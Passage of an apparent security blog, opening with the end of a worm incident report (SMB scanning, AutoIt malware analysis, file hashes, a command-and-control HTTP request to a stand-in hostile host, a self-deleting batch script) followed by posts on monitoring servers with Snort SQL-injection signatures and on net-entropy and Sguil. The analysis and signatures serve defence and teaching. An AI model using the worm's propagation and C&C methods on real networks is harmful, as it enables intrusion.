After this attempted download, Ian’s machine starts trying to contact TCP ports 139 and 445 on IP addresses that are based on the determined outside global address of Ian’s machine (xxx.yyy.49.253).

TCP139 and TCP445 are used by the SMB protocol (Windows file sharing).

The scan starts with IP address xxx.yyy.49.1, and increments sequentially. As the day progresses, the scan of xxx.yyy.49.aaa finishes, and continues to scan xxx.yyy.50.aaa and xxx.yyy.51.aaa.

This is the behaviour of a worm. Something on Ian’s machine is trying to propagate to other machines nearby.

08:13:14 BST
Ian notices a process called ip.exe running in a command prompt window on his computer and he physically disconnects it from the network. This action was taken a very creditable 41 seconds after the first suspicious network activity.

Ian attempts to stop ip.exe running and remove it from his machine, and also deletes a file called gxcinr.exe from his USB stick.

08:24:51 BST
Ian reattaches his machine to the network.

08:25:36 BST
Ian uses Google to research ip.exe, and reads a blog posting which talks about its removal. Ian considers his machine clean at this point since the most obvious indicator (ip.exe) is no longer present.

08:57:32 BST
The external sequential SMB scanning observed before the attempted cleanup restarts at xxx.yyy.49.1.

Additionally, an internal scan commences at this point of the 192.168.1.aaa subnet (i.e., the enterprise’s internal network).

As the day progresses, the scan covers 192.168.2.aaa, 192.168.3.aaa, 192.168.4.aaa, 192.168.5.aaa, 192.168.6.aaa, 192.168.7.aaa and 192.168.8.aaa before Ian’s machine is switched off for the day. These latter subnets are not in use, so no connections were made to target systems.

The scan of 192.168.1.aaa is bound to bear fruit. Within this range, any detected SMB shares on enterprise computers will be accessed with the rights of a Domain Administrator.

8:58:43 BST
$AV_VENDOR detects and quarantines a threat named “W32/Autorun.worm.zf.gen” on $VICTIM_WORKSTATION_1 (Annie Timms’ machine). The threat was in a file called gxcinr.exe, which was in C:\Users\ on Annie’s machine. $AV_VENDOR cites $ATTACKER (Ian’s machine) as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

9:00:08 BST
$AV_VENDOR detects and quarantines the same threat in the same file in the same location on $VICTIM_WORKSTATION_2. Linda Charles was determined to be the logged on user at the time, and again Ian’s machine was cited as the threat source. This alert was propagated to the $SIEM via $AV_MANAGEMENT_SERVER, and the $SIEM sent an alert email to the security team.

9:34:45 BST
$AV_VENDOR on $VICTIM_SERVER_1 detects the same threat in the same file, but in a different directory (C:\Program Files\Some software v1.1\). The threat was quarantined. No threat source was noted, although a successful type 3 (network) login from Ian.Oswald was noted immediately prior to the detection, making Ian’s machine the likely attacker. Unfortunately, the detection was _not_ propagated to $AV_MANAGEMENT_SERVER, and therefore did not find its way to the $SIEM to be sent as an email.

9:37:51 BST
The same threat was detected and quarantined on $VICTIM_SERVER_2, this time in E:\Testbeds\TestOne\. Again, a type 3 login from Ian.Oswald precedes the detection, which again was not propagated to $AV_MANAGEMENT_SERVER, $SIEM or email.

9:40:00 BST
The same threat appears on $VICTIM_SERVER_3, in C:\Program Files\SomeOtherSoftware. $AV_VENDOR does not detect the threat, because it isn’t fully installed on this machine.

NOTE – Detection of gxcinr.exe on this machine was by manual means, after the malware’s propagation mechanism was deduced (see next entry). $AV_VENDOR was subsequently installed on $VICTIM_SERVER_3 and a full scan performed. For what it’s worth, this did not detect any threats.

09:46:05 BST -> 09:54:44 BST
The border $IPS sensor detected Ian’s machine connecting to and enumerating SMB shares on three machines on $ISP’s network (i.e., other $ISP customers external to the enterprise).

This clue helps us see how the malware is spreading, and why the threats were detected in the cited directories.

The malware conducts a sequential scan of IP addresses, looking for open SMB ports. If it finds one, it enumerates the shares present, picks the first one only, and copies the threat (gxcinr.exe) to that location (i.e., \\VICTIMMACHINE\FirstShare\gxcinr.exe):

  • C:\Program Files\Some software v1.1\ equates to the first share on $VICTIM_SERVER_1 – \\$VICTIM_SERVER_1\Software
  • E:\Testbeds\TestOne\ equates to the first share on $VICTIM_SERVER_2 – \\$VICTIM_SERVER_2\TestOne
  • C:\Users equates to the first share on Annie’s and Linda’s machine – \\$VICTIM_WORKSTATION_1\Users and \\$VICTIM_WORKSTATION_2\Users
  • C:\Program Files\SomeOtherSoftware equates to the first share on $VICTIM_SERVER_3 – \\$VICTIM_SERVER_3\\SomeOtherSoftware

This knowledge allows us to manually check other machines on the enterprise network by performing the same steps as the malware. Other machines and devices were found to have open file shares, but either the shares were not writeable from a Domain Administrator’s account, or there was no trace of the threat (gxcinr.exe).

Circa 14:00 BST
Ian turns his machine off and leaves the office until the following Monday.

The following Monday
Ian returns to the office and wipes his machine, installing Windows 7 in place of the previous Windows Vista. “Patient Zero” is therefore gone forever, and any understanding we could have extracted from it is lost.

END OF TIMELINE

Part Two – Analysis of gxcinr.exe

It is necessary to understand what this file is, what it does, and how it persists in order to know if we have eradicated the threat. We also need to understand if gxcinr.exe was responsible for the propagation from Ian’s machine, or if it was just the payload.

Samples of gxcinr.exe were available in five places, namely the unprotected $VICTIM_SERVER_3 server and in the quarantine folders of the four machines where $AV_VENDOR detected the threat. We reverse-engineered the quarantine file format used by $AV_VENDOR and extracted the quarantined threats for comparison.

On $VICTIM_SERVER_3 machine, the MAC times for gxcinr.exe were as follows:

Modified: aa/bb/2009 09:13
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
No file attributes were set.

Additionally, a zero-byte file called khw was found alongside gxcinr.exe. Its MAC times correlate with those of gxcinr.exe, indicating that it was either propagated along with gxcinr.exe or created by it:

Modified: xx/yy/2010 09:40
Accessed: xx/yy/2010 09:40
Created: xx/yy/2010 09:40
Attributes: RHSA

khw was also found on Linda Charles’s machine, and removed manually. No other machines had khw on them.

All five samples of gxcinr.exe were found to be identical:

File size: 808164 bytes

Hashes:
MD5 : 2511bcae3bf729d2417635cb384e3c08
SHA1 : 45fe02e4489110723c2787f3975ae7122b905400
SHA256: b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3

VirusTotal report is here:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1272966302

The AV detection rate is pretty good, although we were the first people to submit this specific malware sample to VirusTotal for analysis (i.e., it’s a reasonably fresh variant of a malware strain).

Whilst it’s not a safe assumption to judge the nature of malware by AV vendors’ descriptions alone, most of the descriptions have AutoIt in their names. AutoIt is a scripting tool that can be used to produce executables to carry out Windows tasks. Analysis of ASCII and Unicode strings contained in the sample lends weight to this theory.

AutoIt has an executable-to-script feature, but this was unable to extract the compiled script. Research suggests that this feature has been removed from recent versions of the software as a security precaution.

The sample contains the string below, amongst many other intelligible artefacts:

“This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.”

The address above was emailed asking for help, but no response was received.

The next step was to carry out dynamic analysis of the sample (i.e., the executable was run in an instrumented and controlled environment and the results observed).

When run, gxcinr.exe did very little. There was no geolocation, no IP address determination, no instance of ip.exe, no scanning, and no second-stage download.

However, three temporary files were discovered which gxcinr.exe created and later attempted to remove:

  1. aut1F.tmp (random filename, judging by repeated runs) is binary, first four bytes is the ASCII string EA06 (http://www.virustotal.com/analisis/b3508b5a86ca4b9d972ce46dd4dcc1dcbe528a24190d2ed10a3cfcf8038c8ecd-1273577387). There is no obvious decode or deobfuscation.
  2. jbmphni (random filename, judging by repeated runs) is ASCII and starts off “3939i33t33i33t3135i33t…..”. There are many repeating patterns in the file, some of which are several tens of characters long (http://www.virustotal.com/analisis/0ad63912039550b5bdfd8a08ce5f49997ed1fced070df4d8e51cbffa500f102d-1273577394). Again, there is no obvious decode or deobfuscation.
  3. s.cmd is a cleanup script, run by gxcinr.exe after it itself has deleted the files above:

    :loop
    del “C:\gxcinr.exe”
    if exist “C:\gxcinr.exe” goto loop
    del c:\s.cmd

Running the sample in this manner yielded no obvious activity, infection, propagation or persistence.

However, if the file khw is present in the same directory as gxcinr.exe, different behaviour is observed. The three files above are extracted, the cleanup above is observed, but also:

  • A slightly modified version of the sample is copied to c:\windows\system32 as csrcs.exe. The name of the file is a deliberate attempt to hide in plain sight – there is a legitimate windows file called csrss.exe. Additionally, the file’s create and modified times are artificially set to match the date that Windows was installed. VirusTotal says this of csrcs.exe:
    http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274359325
  • No attempt is made to hide csrcs.exe from detection, nor does it delete its prefetch file. No matching prefetch files were found on the machines belonging to Annie and Linda, so it is unlikely that the malware executed there. Prefetch is disabled by default on Windows Server 2003, so this kind of analysis cannot be performed on $VICTIM_SERVER_1, $VICTIM_SERVER_2, and $VICTIM_SERVER_3.
  • csrcs.exe is set to auto-run with each reboot by means of various registry keys.
  • csrcs.exe contacts a command and control server at IP address qqq.www.eee.rrr on varying ports in the 81-89 range. The request was HTTP, and looked like this:

    GET /xny.htm HTTP/1.1
    Host: http://www.hostile.com:85
    Cache-Control: no-cache

    The response is encoded somehow:

    HTTP/1.1 200 Ok
    Content-Length: 2811
    Last-modified: xxx, xx xxx 2010 11:13:30 GMT
    Content-Type: text/html
    Connection: Keep-Alive
    Server: SHS

    <zZ45sAsM8Y77V69S888S6 … snip … 80ew0kty0j4tyj004>

    There is no obvious decode of the response, but we are likely receiving instructions of some kind. Looking retrospectively at the evidence secured at the time, we can see Ian’s machine contacting this IP address:

    08:12:39.048 BST: %IPNAT-6-CREATED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    08:12:41 BST Cisco Netflow : bytes: 289 , packets: 5 , 192.168.1.11 /50345 -> qqq.www.eee.rrr /85 ­ TCP

    08:13:39.393 BST: %IPNAT-6-DELETED: tcp 192.168.1.11:50345 xxx.yyy.49.253:50345 qqq.www.eee.rrr:85 qqq.www.eee.rrr:85

    This C&C channel was not readily obvious due to the presence of Skype on Ian’s machine – there were too many other connections to random IP addresses on random ports for this to stand out.

    Despite the fact this suspected C&C channel uses unencrypted HTTP, only nominated ports are inspected via $URLFILTER (port 80 is inspected as the default, plus other ports where we have seen HTTP running in the past). At the time, 85 was not one of the nominated ports so no inspection of this traffic was carried out. Had port 85 been in the list, $URLFILTER would have blocked the request, as the destination is categorised as Malicious. It is unknown if this step would have prevented the worm from spreading, but it would have at least been another definite indicator of malice.

  • csrcs.exe then gets its external IP address and geolocation in the manner observed from Ian’s machine
  • csrcs.exe then starts scanning in the manner observed from Ian’s machine
  • csrcs.exe infects other machines in the manner observed from Ian’s machine

In our tests, csrcs.exe created a file on each remote victim machine called owadzw.exe, and put the file khw alongside it (suggesting that gxcinr.exe is a randomly generated filename). We did not observe any attempt to execute owadzw.exe, nor were any registry keys modified. The malware appears to spread, but seems to rely on manual execution when the remote file share is on a fixed disk.

However, if the file share that is accessed is removable media (USB stick, camera, MP3 player or whatever), an autorun.inf file is created that will execute the malware when the stick is inserted in another computer. It is likely therefore that Ian’s USB stick was infected in this manner, and the malware was unleashed on the enterprise by virtue of him plugging it in.

The VirusTotal result for owadzw.exe is similar to the results for gxcinr.exe and csrcs.exe, so they are all likely to be slight variations of one another:

http://www.virustotal.com/analisis/b656c57f037397a20c9f3947bf4aa00d762179ebf6eb192c7bc71e85ea1c17f3-1274356524

We did not observe csrcs.exe trying to download any other executables, as was the case with Ian’s machine, nor did we observe ip.exe running on an infected machine.

Aside from spreading, the purpose of the malware is unknown. However, it is persistent (i.e., it will run every time you start your machine) and it does appear to have a command and control facility. It is entirely possible that at some later date it will ask for instructions and be told to carry out some other kind of activity (spamming, DOS, etc.) or it may download additional components (keyloggers, for example).

Where do we stand?

We understand the malware’s behaviour, and know how to look for indicators of it running both in terms of network activity and residual traces on the infected host. At present there are none, so we appear to be clean.

What went right?

  • An incident was triggered by virtue of an explicit indicator of malice (the $AV_VENDOR alerts from Annie’s and Linda’s machines).
  • Where functioning properly, $AV_VENDOR prevented the spread of the malware.
  • $URLFILTER blocked a malicious download.
  • We were able to preserve and analyse sufficient evidence in total absence of Patient Zero (Ian’s machine) for us to understand how the malware spreads. This let us carry out a comprehensive search for any other, undetected, infections (like the one on $VICTIM_SERVER_3).
  • We were able to recover a sample of the malware and analyse it to the extent that we can say with a good degree of confidence that it was present on Ian’s USB stick, and was responsible for the whole incident (as opposed to merely being the payload for some other unknown malware that had been running on Ian’s machine for an unknown period of time).
  • We were able to sharpen our detection of the malware, now that we know how it behaves.

What went wrong?

  • The infection was not stopped at its point of entry (Ian’s machine), most likely because $AV_VENDOR wasn’t working properly.
  • The malware executed as a Domain Administrator, effectively unlimiting the damage it could have caused.
  • The malware spread outside of the enterprise and infected other machines.
  • The malware infected an enterprise machine unprotected by $AV_VENDOR.
  • $VICTIM_SERVER_1 and $VICTIM_SERVER_2 did not report their infection to $AV_MANAGEMENT_SERVER. These detections were only discovered as part of the evidence preservation process.
  • $URLFILTER did not block the C&C channel due to the way it was configured.
  • The $IPS didn’t fire any “scanner” signatures.
  • No statistical alarms were raised by the $SIEM.

What can be changed or done better?

  • A review of the state of the $AV_VENDOR deployment should be carried out. We need to know what the coverage is like, how well the updates are working, and why certain machines don’t report to $AV_MANAGEMENT_SERVER.
  • Some form of USB device control should be implemented.
  • People with Administrative rights on the enterprise network should have two accounts, one “Admin” account and one “Normal” account. The Normal account should be used day-to-day, with the Admin account used only where necessary. This would put a cap on the capability of any malware that is able to run.
  • Unnecessary fileshares should be removed. It was determined experimentally that if you share anything within any user profile on a Vista or Win7 machine, the entire c:\users\ directory gets shared. This was the case on Annie’s and Linda’s machines.
  • The presence of Skype doesn’t help when dealing with an incident like this.
  • If a tighter outbound port filtering policy was applied, then the command and control channel would have been blocked, as would the worm’s attempts to propagate outside of the enterprise.

END OF REPORT

The production of this report would not have been possible without the routine collection of evidence from everything-you-can-lay-your-hands-on – servers, routers, switches, AV servers, URL filters and IPS devices all contributed to the report (notable things that did not contribute to the report are Ian’s machine and his USB stick, since they were wiped before they could play a part).

Without these event sources, all we’d have had were two reports of removed malware. Hardly cause for alarm, surely….


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Rear echelon NSM

Posted in General Security, NSM on 20 April, 2010 by Alec Waters

When it comes to any kind of traffic analysis device, proper placement is of critical importance – if it’s in the wrong place on the network, it won’t be able to see what you hope it will, and you’ll be blind to any badness that it could potentially detect.

If you work for the kind of company that develops (and subsequently hosts or supports) interactive web applications for clients, having a sensor keep watch over a your Internet-facing production servers is probably a good idea. However, how did all of your clients’ web application goodness get onto a production server in the first place? With a bit of luck, each application started its life on some kind of private development server, after which it moved onto a public user acceptance testing (UAT) server for the client to take a look at. Only after client sign-off would it have moved to the production server.

I think that it’s a good idea to place sensors to watch over the seemingly less-important development and UAT servers, too. Let’s take each in turn:

Development Servers

Dev boxes are usually well within an organisation’s perimeter, behind firewalls and the like. Why would anyone try to take hostile action against a dev server? Surely if an attacker was even in a position to do so, you’d have far greater problems than attacks on the dev server – you’d have an attacker roaming at will within the castle walls. So what’s the point?

Well, here’s an example. Let’s say your sensor is loaded up with a whole bunch of signatures that attempt to detect various classes of web attack (SQL Injection, XSS, etc.), and you’ve got developers who just love technologies like AJAX and JSON. It’s terribly useful to have an AJAX request return some JSON-formatted data, a bit like the example here (seems to work OK in IE and FireFox). Type the letter A into the first textbox, and an AJAX request is made to the server which returns a JSON-formatted resultset of people whose names begin with A (fire up Wireshark and take a look at the requests for /specials/ajax_autosuggest/test.php). This resultset can then be parsed by the browser, and the data processed in whatever manner is necessary. Powerful stuff!

There’s nothing wrong with the example on the page above, but AJAX can go pear shaped if a developer is tempted to embed raw SQL sentences into the request (or even partial sentences like ‘where’ clauses). AJAX requests are under-the-bonnet affairs that don’t appear in the browser’s Location bar so it’s easy to think that they are out of sight and out of mind, when they can often be run directly and outside of their intended context. Any attacker worth their salt will discover and leverage a vulnerable AJAX page, and if there’s raw SQL in it it’s bad news for the application concerned – you’re offering them the chance to execute arbitrary SQL against your server.

So how can NSM help? With a bit of luck, our sensor has signatures like the ones below that stand a chance of picking up raw SQL elements in AJAX requests:

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:”SQL generic sql insert injection atttempt – GET parameter”; flow:established,to_server; uricontent:”insert”; nocase; pcre:”/insert\s+into\s+[^\/\\]+/Ui”; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13513; rev:5;)

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:”SQL generic sql exec injection attempt – GET parameter”; flow:established,to_server; uricontent:”exec”; nocase; pcre:”/exec\s+master/Ui”; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13512; rev:5;)

alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:”SQL generic sql update injection attempt – GET parameter”; flow:established,to_server; uricontent:”update”; nocase; pcre:”/update\s+[^\/\\]+set\s+[^\/\\]+/Ui”; metadata:policy security-ips drop, service http; reference:url,www.securiteam.com/securityreviews/5DP0N1P76E.html; classtype:web-application-attack; sid:13514; rev:7;)

etc…

If signatures like these start firing whilst a new application is under development (and not under attack), it’s time to talk to the developers. Better to nip a vulnerability like this in the bud pre-deployment than to rush out an emergency hotfix post-breach. Even if the SQL isn’t exploitable (can you prove it?), you’re still giving too much away in the form of table and column names.

As an added bonus, an NSM sensor with full-packet capture capability can be used as a handy debugging aid when an obscure browser doesn’t work as expected – there ain’t no substitute for the actual HTTP transaction at times like these!

UAT Servers

These boxes are often sitting on the Internet proper so that the client can come along and review and test pre-release versions of the application. By definition, these are test servers, and may therefore have bugs and vulnerabilities that will hopefully be ironed out during the testing cycle; error reporting may also be turned up to the most verbose level to help the process. There may also be other code present for other projects, or experimental code left by someone wanting to test a theory, or all manner of other flotsam and jetsam.

All of this is advantageous to an attacker, and may eventually allow them access to the server. UAT boxes sometimes need to have “real” customer data on them for realistic testing, which makes them just as high-value a target as the production box. What if the UAT server is also a staging area for deployment? What if an attacker could add their own backdoor code into the staging area, ready for deployment later on?

Dismissing the need to monitor development and UAT servers because “they’re not live machines” sounds like a recipe for trouble to me. You need to protect your assets at all stages of their lifecycle, from the initial brainstorming to the great fdisk in the sky!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

(Mis)reading the runes

Posted in General Security, NSM on 16 February, 2010 by Alec Waters

Richard’s post over here talks about the “Intruder’s Dilemma”:

The defender only needs to detect one of the indicators of the intruder’s presence in order to initiate incident response within the enterprise.

I agree wholeheartedly. However, the wonderful thing about Indicators is that there can be lots and lots of them, and interpreting them can be tricky. Sometimes it’s easy to misinterpret what they’re telling you, and sometimes it’s tempting to focus 100% on the first or most prominent Indicator observed, ignoring (or not looking for) other ones that will add context and detail to the overall situation.

Take for example the Indicator in the picture below. What are we looking at?

  1. An enclosure at a wildlife park, or
  2. Some kind of strip club?

I was pretty disappointed when I went in, because:

  • For some reason, I had chosen to focus on my first interpretation of the Indicator, and
  • I had failed to take into account any unfavourable counter-Indicators that contradicted my assessment (the most prominent of which was being at a zoo at the time)

A while back, we had a problem with one of our systems – ProcessA wasn’t able to talk to ProcessB (the “security” slant here is that we’re dealing with a compromise of the “availability” facet of the CIA Triad). The system wasn’t working, and ProcessA had left loads of Indicators in the form of log entries which said “I tried to talk to ProcessB on port 1234 but I couldn’t”. ProcessA was clearly working at this point (otherwise there would have been no log entries), so the initial interpretation of the Indicator was that ProcessB was in some way at fault.

Cue the usual troubleshooting process:

  • Is ProcessB running? Yes.
  • Is ProcessB accepting requests right now? Yes, it seems to be working. The error messages from ProcessA are intermittent.
  • Was ProcessB running at the time ProcessA logged the messages? Yes. ProcessB logs startup/shutdown messages, and there aren’t any for this particular timeframe.
  • Was there some kind of network problem? Unlikely, since ProcessA and ProcessB are running on the same server.
  • Are you sure it wasn’t the network? Given the above, the network really can’t have much of a hand in this!
  • But ProcessB listens on IP address 1.2.3.4, which is bound to a physical interface. If that interface went down, wouldn’t ProcessB’s ability to listen be affected? Yes, but logs from the switch that the server connects to don’t show any up/down events for the interface concerned.

And so it went on, for several hours. ProcessB was deemed to be at fault, yet we couldn’t find anything wrong with it. The troubleshooting had become bogged down because:

  1. We were proceeding under the assumption that ProcessB was broken (I mean, duh!! ProcessA wouldn’t have left all those log messages if ProcessB were working, would it?!?)
  2. We were ignoring a gigantic counter-Indicator, namely “there’s nothing wrong with ProcessB”.

It generally takes two to tango, something that applies as much to TCP comms as anything else. If the server’s not at fault, perhaps it’s the client, ProcessA?

As it turns out, ProcessA was indeed the one with the problem. An errant service, ProcessZ, had been leaving thousands of sockets in the CLOSE_WAIT state (this almost always indicates a problem with the software, rather than an expected TCP phenomenon). Eventually, it got to the point where the tango-ing ProcessA needed a client socket to talk to ProcessB, but there weren’t any ephemeral ports available because ProcessZ had, over time, left them all in CLOSE_WAIT (Windows Server 2003 only allows for 5000 ephemeral ports by default). Lacking a client socket with which to talk to ProcessB, ProcessA therefore duly logs a message to say that “I tried to talk to ProcessB on port 1234 but I couldn’t”…

Restarting ProcessZ was a temporary band-aid – all the sockets in CLOSE_WAIT went away, and ProcessA danced the night away with ProcessB.

The moral of the story? Don’t take isolated Indicators at face value. There will almost always be other Indicators that either back up or refute your assessment – all you have to do is look for them.

The other moral of the story? Very few zoos have strip clubs 🙂


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Making sense of the results of the net-entropy experiment

Posted in Crazy Plans, net-entropy, NSM on 19 January, 2010 by Alec Waters

The rest of the net-entropy saga is listed here, but to briefly recap, net-entropy is a tool that can be used to profile the level of “randomness” of network traffic. High entropy traffic like this is usually either encrypted or compressed in nature, and I’m definitely interested in knowing about the presence of the former on my network. I’ve been using net-entropy as a general purpose “randomness detector”, something that the author didn’t really have in mind when he wrote it.

However, drawing meaningful conclusions from the results gathered can be tricky (this is nothing to do with net-entropy itself, and everything to do with the way I’m using it backwards to generically detect randomness). Some of the observed high entropy traffic will definitely fall into the “encrypted” category, like SSH and Remote Desktop. Other stuff will definitely be of the “compressed” flavour, like RTMP on port 1935.

Once this kind of low-hanging fruit has been pruned, the analyst is left with a whole load of unknown high-entropy traffic. If net-entropy’s presence is to be of any value at all when deployed this way, we have to try to make sense of the residual data in some way or another.

One tactic is to fire up Sguil and use its full-content capture to extract and examine each of the unknown high-entropy streams in turn. This is massively labour intensive, but some of the time you’ll find something interesting like HTTPS on a non-standard port (the certificate exchange at the start of the conversation is in clear text, giving you a clue). Most of the time however, you’re left looking at unintelligible garbage. Unsurprising really, given that it’s likely to be either compressed or encrypted…

Given that protocols like SSH, RDP and RTMP can most usually be identified by their port numbers alone and what’s left is unreadable junk, how are we to derive value from these other indicators from net-entropy? I can think of a couple of ways:

  • Session contextualisation
  • Session profiling on the basis of session duration and frequency, etc

Putting a high-entropy session into context isn’t too labour intensive, and sometimes pays dividends. Let’s say net-entropy has spotted a session from 1.2.3.4:25333 to 4.3.2.1:3377; the full-content capture is unreadable garbage, and the port numbers offer no clues. If we ask the question “was there any other traffic involving 1.2.3.4 and 4.3.2.1 at the same time”, we might get a hint. In this instance, there was a connection from 1.2.3.4:16060 to 4.3.2.1:21, which looks like an FTP command session judging by the port number. When we examine the full-content capture for this session, we can see passive FTP at work:

227 Entering Passive Mode (4,3,2,1,13,49).

The last two numbers denote the port that the client should connect to to transfer a file. Doing the maths, we see that (13 * 256) + 49 = 3377, so we can be pretty confident that our high-entropy traffic in this case was a file transferred over FTP.

If context can’t be established however, all is not lost – we can look at other attributes of the traffic.

A lot of the high-entropy traffic that we see is bound for random ports on IP addresses all over the world, and most of it is related to peer-to-peer apps. In the case of Skype, high-entropy TCP traffic is usually signaling traffic to SuperNodes. Traffic to a given SuperNode  will occur little-and-often for a long period of time until one of the two endpoints goes offline, so net-entropy will be sending you alerts all day long for that specific destination. However, you certainly can’t say for sure that traffic matching this profile is definitely Skype (it could be a keylogger phoning home at regular intervals, for example). As such, examination of the little-and-often class of high-entropy flow doesn’t usually yield any definitive conclusion.

What is definitely interesting is where you have many high-entropy flows to the same destination address and port in a short period of time. We have detected the following by taking this “clustering” approach:

  • HTTP on a non-standard port, serving up images (most image formats are compressed, and thereby have a high-entropy signature). As an example, some of the images in search results here come from port 7777. Someone browsing this site will trigger many indicators from net-entropy in a short space of time that refer to this port.
  • HTTP proxies. Again, the high-entropy traffic is most commonly as a result of images being transferred.
  • SSL/TLSv1 on port 8083, which turned out to be traffic to a SecureSphere web application firewall.

Clusters like this are most easily detected by eye by means of visualisation. The following image is from one of my Cisco MARS reports, and shows a cluster of traffic to port 8083 in orange:

Something “worth looking at” will usually be quite clear from an image like this.

The approach I’ve taken with net-entropy has yielded neither precise nor definitive results (which certainly isn’t a complaint about net-entropy itself – it was never designed to be used the way I’m using it). But, I’ve discovered things that I’d never have known about without it, so I reckon I’ve come out on top!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

Securitas Vigilantiae Instantis Praemium

Posted in General Security, NSM, Why watch the wire? on 28 October, 2009 by Alec Waters

The inner title page of MI5’s authorised history shows one of the Service’s past logos, bearing the motto: “Securitas Vigilantiae
Instantis Praemium”, intended to mean “Security is the reward of unceasing vigilance”. This seems to me to be as good a motto now as it was seventy years ago.

An enterprise has numerous tools at its disposal to control what happens on its infrastructure. Some examples are technical controls (such as port filtering, or blocking access to certain types of website) and non-technical controls (such as Acceptable Use Policies, violation of which could lead to disciplinary action).

Controls like these describe what you hope should be happening on your network, which isn’t necessarily what is happening. Controls may have been:

  • Intended, but not actually implemented at all
  • Improperly implemented
  • Removed
  • Changed
  • Circumvented (intentionally or otherwise)
  • Or they may not be as effective as you’d have hoped (anti-virus is a good example).

Implementing a control and then leaving it to its own devices doesn’t seem like a viable tactic. Rather than believing it to be effective, we need to make sure it is effective through strategies like the collection of information and the (unceasing) vigilance to detail required to extract the greatest meaning from it.

By doing this, you can verify the effectiveness of your controls. When things go wrong, you can use what you’ve collected to help you understand what happened and how you can modify your controls to help prevent it from happening again.

Without vigilance, we have our head in the sand, hoping for the best. If our vigilance is not unceasing, Murphy’s Law dictates that something Bad will happen the moment we take our eye off the ball.

“Securitas Vigilantiae Instantis Praemium” hardly ranks as catchy, but it certainly hits the nail on the head. Well, one of the nails, anyway.


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk

net-entropy Sguil agent and wiki

Posted in net-entropy, NSM, Sguil on 6 October, 2009 by Alec Waters

The story so far:

I’ve written a basic Sguil agent that will upload net-entropy’s RISING ALARM messages into Sguil. You can download the agent here, and the config file here.

On a Sguil sensor that has net-entropy installed, copy the agent to wherever your other agents live (/usr/local/bin on my system), and the config file to where your other config files live (/etc/nsm/sensor1/ on my system). Then fire it up:

net-entropy_agent.tcl
   -c /etc/nsm/sensor1/net-entropy_agent.conf

With a bit of luck, you’ll see the agent register in the Sguil client:

net-entropy sguilAnd we’ll start to see net-entropy messages appear, too:

net-entropy sguil eventsThe bottom right pane of the Sguil client will behave as it does for the PADS agent, and will show you the event detail:

net-entropy sguil detailSguil will correlate these events in the usual fashion, and allow you to right-click and say “Transcript” or “Wireshark”. It all seems to work pretty well!

Finally, the net-entropy project has a new wiki – it’s here. This is the place to go for the latest source code, which now includes a Paninski entropy estimator in addition to the original Shannon estimator. Have fun!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters(at)dataline.co.uk